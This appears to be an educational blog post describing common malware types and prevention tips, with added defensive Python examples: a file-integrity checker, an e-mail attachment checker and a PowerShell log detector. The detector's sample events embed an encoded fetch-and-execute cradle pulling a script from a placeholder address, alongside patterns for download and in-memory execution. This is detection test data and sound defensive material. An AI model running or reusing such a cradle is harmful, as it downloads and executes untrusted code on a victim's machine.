Malware and its types…

Ajay Krishna
Published in BeyondX
Aug 22, 2020

What is malware?

The term malware (short for malicious software) is an umbrella term for hostile or intrusive software: any program written with the intent of damaging devices (a server, a client, or a whole network), stealing data, or otherwise disrupting their owner. Like the flu in a human body, it interferes with normal functioning.

Malware rarely damages physical hardware directly, but it can steal, encrypt, or delete your data, alter or hijack core computer functions, and spy on your activity without your knowledge or permission.

It is one of the biggest threats on the internet!

So it is crucial that users know how to recognize the different types of malware in order to protect themselves, and their business systems, from compromise. While some are well known (at least by name), others are less well understood.

Most common types of malware are:

Virus

A computer virus is what most of the media and regular end-users call every malware program reported in the news. Fortunately, most malware programs aren’t viruses.

A computer virus is a program that, when executed, replicates by modifying other programs and inserting its own code into them. When this succeeds, the affected files are said to be “infected”. Because the virus only runs when its host file is run, it requires human action to spread to other computers, and it is often spread through email attachments and internet downloads.

Pure computer viruses are uncommon today, comprising less than 10 percent of all malware. That is fortunate, because viruses are the only type of malware that “infects” other files, and that makes them the hardest to clean up: the malicious code has to be cut out of a legitimate program without breaking it. Most antivirus products do not attempt this reliably and will simply quarantine or delete the infected file, which means the legitimate program it was riding on is lost as well.
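To make the point concrete, here is an added example (not code from the original article) of the detection side: a small file-integrity checker in Python that records SHA-256 hashes of a directory tree while it is known clean and later reports which files were modified, added, or removed. The directory, the fake executables, and the simulated infection are all constructed in a temporary folder, so it runs offline.

```python
"""File-integrity check: notice when a legitimate program has been modified.

Added example, not code from the original article. A file-infecting virus
changes the bytes of an existing executable, so the dependable way to catch it
is to compare every file against a hash baseline taken while the system was
known clean. The directory tree, the "programs" and the "infection" below are
all constructed in a temporary directory so the script runs offline.
"""
from __future__ import annotations

import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map each regular file under root (POSIX-style relative path) to its hash."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify(root: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Diff the tree against the baseline: modified, added and missing paths."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a clean tree, then simulate an infection."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = Path(tmp) / "programs"
        (tree / "bin").mkdir(parents=True)
        # Fake executables: a PE-style "MZ" header followed by placeholder bytes.
        (tree / "bin" / "editor.exe").write_bytes(b"MZ" + b"\x00" * 62 + b"editor code")
        (tree / "bin" / "viewer.exe").write_bytes(b"MZ" + b"\x00" * 62 + b"viewer code")
        (tree / "README.txt").write_text("clean install\n")

        # Take the baseline and store it outside the monitored tree. On a real
        # host keep it offline or read-only, otherwise the malware can update it.
        baseline_file = Path(tmp) / "baseline.json"
        baseline_file.write_text(json.dumps(build_baseline(tree), indent=2))

        # Simulate a file infector: append a body to one legitimate program,
        # drop a new file, and delete another. The infected program is still a
        # legitimate file; deleting it removes the program along with the virus.
        with (tree / "bin" / "editor.exe").open("ab") as f:
            f.write(b"\x90" * 16 + b"<<appended virus body>>")
        (tree / "bin" / "dropper.exe").write_bytes(b"MZ" + b"payload")
        (tree / "README.txt").unlink()

        return verify(tree, json.loads(baseline_file.read_text()))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The baseline has to be taken before the compromise and kept where the malware cannot rewrite it; otherwise the checker happily re-baselines the infected file as "known good".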

Worms

Worms are self-replicating malware, similar to viruses, that spread to other computers over a network, typically by exploiting a vulnerability in a network-facing service. Unlike viruses, worms do not need a host file or human interaction to spread; the harm they cause comes from the bandwidth and resources consumed by replication and from whatever payload they carry.

Because they spread fast, worms are often used to deliver a payload, a piece of code that does the actual damage on each host it reaches. Payloads can delete files, encrypt data for a ransomware attack, steal information, or enroll the machine in a botnet.

Keyloggers

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard. Keyloggers are a serious threat to users and their data because they capture everything typed, including passwords, PIN codes, account numbers, email logins, and other confidential information, and deliver it to the attacker.

Adware

Adware is unwanted software designed to throw advertisements up on your screen, most often within a web browser. Typically it uses an underhanded method to get installed: either disguising itself as legitimate software or piggybacking on another program to trick you into installing it on your PC, tablet, or mobile device.

Thankfully, adware is not difficult to spot. Typical signs are seeing the same ad on every website you visit, a flood of aggressive pop-ups, or a browser homepage or search engine that changed without your doing so. To be clear, an annoying ad on its own does not mean you have adware.

Spyware

Spyware is malware that gathers information about a person or organization, usually without their knowledge, and sends it to the attacker without the victim’s consent. These spying capabilities can include activity monitoring, collecting keystrokes, data harvesting (account information, logins, financial data), and more.

For example, DarkHotel, which targeted business and government leaders through hotel Wi-Fi, used several types of malware to gain access to the systems of specific high-value individuals. Once that access was gained, the attackers installed keyloggers to capture their targets’ passwords and other sensitive information.

Adware and spyware are usually the easiest kinds of malware to remove, largely because they are less aggressive about hiding and defending themselves than other types.

Trojan Horse

A Trojan horse, usually just called a Trojan, is malware that disguises itself as desirable code or software. The term comes from the Ancient Greek story of the deceptive wooden horse that led to the fall of Troy. Cybercriminals deliver Trojans in the guise of routine software and persuade the victim to install it themselves.

Trojans are generally spread through social engineering such as phishing. For example, a user may be tricked into executing an email attachment disguised to look genuine (a file named like an Excel spreadsheet that is really an executable). Once the file is opened, the Trojan is installed and the attacker has a foothold from which data can be stolen. Unlike viruses and worms, Trojans do not replicate on their own; they depend on the victim to run them. Trojans often act as spyware, too, allowing attackers to watch your actions.
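As an added example (not part of the original post), the following Python script applies the two cheap checks a mail gateway or a careful user can make on an attachment: does the name carry a double extension such as .pdf.exe, and do the file’s first bytes match what the extension claims? The attachments are constructed byte strings with realistic headers, not real malware.

```python
"""Check whether an e-mail attachment is what its name claims.

Added example, not part of the original article. Trojans delivered by mail
rely on the file name looking harmless ("invoice.xlsx") while the content is
something else. Two cheap checks catch most of that: (1) a double extension
such as "report.pdf.exe", and (2) a mismatch between the extension and the
file's magic bytes. The sample attachments are constructed byte strings.
"""
from __future__ import annotations

from dataclasses import dataclass

# Magic bytes for a few common formats. Office 2007+ documents are ZIP
# containers, so .docx/.xlsx/.pptx all start with the PK signature.
MAGIC = {
    b"MZ": "exe",
    b"PK\x03\x04": "zip",
    b"%PDF": "pdf",
    b"\xd0\xcf\x11\xe0": "ole",   # legacy .doc/.xls (OLE compound file)
    b"\x7fELF": "elf",
}

# Which detected container each claimed extension is allowed to have.
EXPECTED = {
    "xlsx": {"zip"}, "docx": {"zip"}, "pptx": {"zip"},
    "xls": {"ole"}, "doc": {"ole"},
    "pdf": {"pdf"},
    "zip": {"zip"},
    "exe": {"exe"}, "scr": {"exe"}, "com": {"exe"},
    "txt": set(),  # plain text has no signature; anything with one is suspicious
}

# Extensions Windows treats as directly executable when double-clicked.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "ps1", "hta", "msi"}


@dataclass
class Verdict:
    filename: str
    claimed_ext: str
    detected: str | None
    reasons: list[str]

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def detect_type(data: bytes) -> str | None:
    """Identify the real format from the leading bytes, or None if unknown."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return None


def inspect_attachment(filename: str, data: bytes) -> Verdict:
    # Strip padding tricks like "invoice.xlsx      .exe" and compare
    # extensions case-insensitively.
    name = filename.strip()
    parts = [p.strip().lower() for p in name.split(".")]
    exts = parts[1:] if len(parts) > 1 else []
    claimed = exts[-1] if exts else ""
    detected = detect_type(data)
    reasons: list[str] = []

    if len(exts) >= 2 and exts[-2] in EXPECTED and claimed in EXECUTABLE_EXTS:
        reasons.append(f"double extension: looks like .{exts[-2]} but is .{claimed}")
    if claimed in EXECUTABLE_EXTS:
        reasons.append(f"directly executable attachment (.{claimed})")
    if claimed in EXPECTED:
        allowed = EXPECTED[claimed]
        if detected is None and allowed:
            reasons.append(f"content has no {claimed} signature")
        elif detected is not None and detected not in allowed:
            reasons.append(f"extension .{claimed} but content looks like {detected}")
    return Verdict(name, claimed, detected, reasons)


# Constructed sample attachments (header bytes only, not real malware).
SAMPLES = {
    "Q3-report.xlsx": b"PK\x03\x04" + b"\x00" * 26 + b"[Content_Types].xml",
    "invoice.pdf.exe": b"MZ\x90\x00" + b"\x00" * 60,
    "statement.xlsx": b"MZ\x90\x00" + b"\x00" * 60,   # renamed executable
    "notes.txt": b"meeting at 10, bring slides",
    "contract.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3",
}


def scan_samples() -> dict[str, list[str]]:
    """Run the check over every constructed sample and return the reasons per file."""
    return {name: inspect_attachment(name, data).reasons for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, reasons in scan_samples().items():
        status = "SUSPICIOUS" if reasons else "ok"
        print(f"{name:20} {status:10} {'; '.join(reasons)}")
```

The magic-byte check is deliberately conservative: it only flags a mismatch it can prove, so a .txt with no signature passes while a .txt that begins with an MZ header does not.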

Ransomware

Ransomware does what its name describes: it encrypts your files or locks your device and demands payment to restore access. It has accounted for a large share of malware for the last few years, and that share is still growing. Ransomware has crippled companies, hospitals, police departments, and even entire cities.

Ransomware (often delivered as a Trojan) spreads through phishing emails, malvertising, compromised websites, and exploitation of unpatched vulnerabilities.

Ransomware can be prevented with the same measures as other malware, but once it has executed, the damage is hard to reverse without a good, validated backup that the ransomware could not reach. According to some studies, about a quarter of victims pay the ransom, and of those, about 30 percent still do not get their files back.

Rootkit

A rootkit is a collection of software designed to give an attacker privileged, unauthorized access to a computer while hiding its own presence, and often that of other malware, from the operating system and security tools. Once a rootkit is installed, the party behind it can remotely execute files and access or steal information. Rootkit prevention, detection, and removal are difficult because of this stealth: a rootkit running at kernel level can lie to the very tools used to look for it. Detection therefore relies on methods such as monitoring for irregular behavior, signature scanning, and memory dump analysis. For example, Zacinlo infects systems when users download a fake VPN app; once installed, it sweeps the system for competing malware and tries to remove it.

When a rootkit is discovered, many experts recommend wiping the drive and reinstalling everything from scratch rather than trusting a cleanup, since you cannot be sure what else the rootkit has hidden.

Botnets

A bot is a computer infected with malware that lets an attacker control it remotely. Bot malware can self-replicate (like a worm) or rely on user action to spread (like a virus or Trojan). A network of such compromised devices under one attacker’s control is known as a botnet.

[Figure: affected regions of the Mirai botnet]

The botnet is then used to launch large, remotely controlled floods of traffic, such as DDoS attacks. Botnets can become very large: the Mirai IoT botnet, built from routers, cameras, and other internet-connected devices that still had their default credentials, ranged from 800,000 to 2.5 million devices.

Fileless Malware

Fileless malware is not really a separate category of malware but a description of how the malware gets in and persists. By some counts, over 50 percent of today’s malware is fileless. Rather than dropping an executable on disk, it runs in memory, typically by abusing legitimate tools already on the system such as PowerShell or WMI, and it persists through OS objects other than ordinary files, such as registry keys and scheduled tasks.

The result is that fileless attacks are harder to detect with file-based antivirus and harder to stop. If you are not already familiar with common fileless attack techniques and tools, you should be if you want a career in computer security.
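The added Python example below (not from the original article) shows what looking for fileless activity means in practice: it reads process-creation records in a Sysmon-like JSON shape, decodes PowerShell -EncodedCommand arguments (Base64 over UTF-16LE, the encoding PowerShell uses), and flags download cradles, in-memory execution, and hidden-window flags. The events, process IDs and the 203.0.113.7 address are constructed test data.

```python
"""Spot fileless-style PowerShell launches in process-creation logs.

Added example, not from the original article. Fileless attacks commonly run
through a legitimate interpreter with an encoded command line, so nothing
malicious is written to disk as a file. The detector decodes -EncodedCommand
arguments (Base64 of UTF-16LE text) and flags download cradles, in-memory
execution and hidden windows. The log lines are constructed JSON records in a
Sysmon-like shape, not real telemetry.
"""
from __future__ import annotations

import base64
import binascii
import json
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand, down to -e.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encod|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)
SUSPICIOUS_PATTERNS = {
    "download cradle": re.compile(r"(?i)(?:DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|iwr\s|curl\s)"),
    "in-memory execution": re.compile(r"(?i)(?:\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load|FromBase64String)"),
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "profile/policy flags": re.compile(r"(?i)(?:-nop\b|-noprofile|-ep\s+bypass|-ExecutionPolicy\s+bypass)"),
}


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse(record: dict) -> dict:
    """Score one process-creation record; the decoded payload is searched too."""
    cmdline = record.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(haystack)]
    if decoded is not None:
        hits.insert(0, "encoded command")
    return {"pid": record.get("ProcessId"), "image": record.get("Image"),
            "decoded": decoded, "hits": hits}


def _encode(ps: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    json.dumps({"ProcessId": 4120, "Image": PS_EXE,
                "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\rotate-logs.ps1"}),
    json.dumps({"ProcessId": 5008, "Image": PS_EXE,
                "CommandLine": "powershell.exe -nop -w hidden -enc "
                + _encode("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage1.ps1')")}),
    json.dumps({"ProcessId": 5121, "Image": r"C:\Windows\System32\cmd.exe",
                "CommandLine": "cmd.exe /c dir"}),
    json.dumps({"ProcessId": 5330, "Image": PS_EXE,
                "CommandLine": "powershell.exe -EncodedCommand " + _encode("Get-Date")}),
]


def scan(lines: list[str], min_hits: int = 2) -> list[dict]:
    """Return analysed events that carry at least min_hits indicators."""
    results = []
    for line in lines:
        r = analyse(json.loads(line))
        if len(r["hits"]) >= min_hits:
            results.append(r)
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(f"pid {r['pid']}: {', '.join(r['hits'])}\n  decoded: {r['decoded']}")
```

The threshold matters: an encoded command by itself, or a lone -NoProfile, is common in legitimate administration, so only the event that combines several indicators is reported.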

How can we avoid malware?

Now that you know the common types of malware, you also need to know how to avoid them. Here are some tips you can follow:

  • Run reputable anti-malware software and keep it, and its signatures, up to date.
  • Keep your operating system, drivers, browsers, and plugins patched.
  • Do not open, click, or download anything that looks suspicious, whether a file, an ad, or an email attachment, and check that an attachment’s type matches its name.
  • Practice safe browsing.
  • Use strong, unique passwords (a password manager helps), enable multi-factor authentication where available, and change a password as soon as you suspect it has been exposed.
  • Be wary of social engineering attacks.
  • Keep offline or otherwise isolated backups and test that they actually restore.
